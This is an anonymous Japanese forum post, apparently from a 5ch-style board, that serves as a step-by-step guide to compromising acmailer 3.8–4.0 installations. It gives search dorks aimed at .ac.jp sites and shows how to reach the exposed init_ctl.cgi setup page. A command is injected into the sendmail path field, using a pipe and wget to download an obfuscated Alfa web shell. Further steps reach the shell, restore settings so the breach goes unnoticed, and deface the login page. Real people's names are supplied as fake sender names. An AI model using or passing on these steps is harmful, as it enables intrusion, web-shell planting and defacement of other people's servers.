727 - [´・ω・`] tor-exit1-terrahost06.tuxli.org 2023/07/19(水) 08:48:12.67 ID:BNhLqgGN0
イノシシでもできるacmailer カラッキング講座
"acmailer3.8"とか"acmailer4.0"で検索する
例 acmailer3.8 site:ac.jp
出てきたサイトURLの末尾の/???.cgiを消して
を削除してinit_ctl.cgiを加える
初期設定画面が表示されたら
差出人名:唐澤貴洋とか藤原太一
メールアドレス:[email protected](サイトのurl)とか[email protected]
ログインID:krsw
ログインPW:krsw
sendmailパス:「|wget -O a.php ttps://github.com/nicolauns/alfa-shell/raw/master/alfa-obfuscated.php」
これでシェルを設置できる
CGI設置URL:ttp://hoge.com/hoge/ (httpにしないとダメです)
CGI設置場所:そのままでおk
これで設置できたら/a.php
でシェルに飛べる例
ttp://?????/cgi-bin/mailer/a.php
ttp://?????/cgi-bin/mailer/index.cgi
各種設定→送信サーバー設定→ローカルサーバー→sendmailパスを「/usr/sbin/sendmail」に戻す→更新を押す
これをしないとメールは送信できない
おまけ
各種設定→システム設定→タイトル→好きなワード→更新
でログイン画面のワードを弄れる
脆弱性は4.0ぐらいまで存在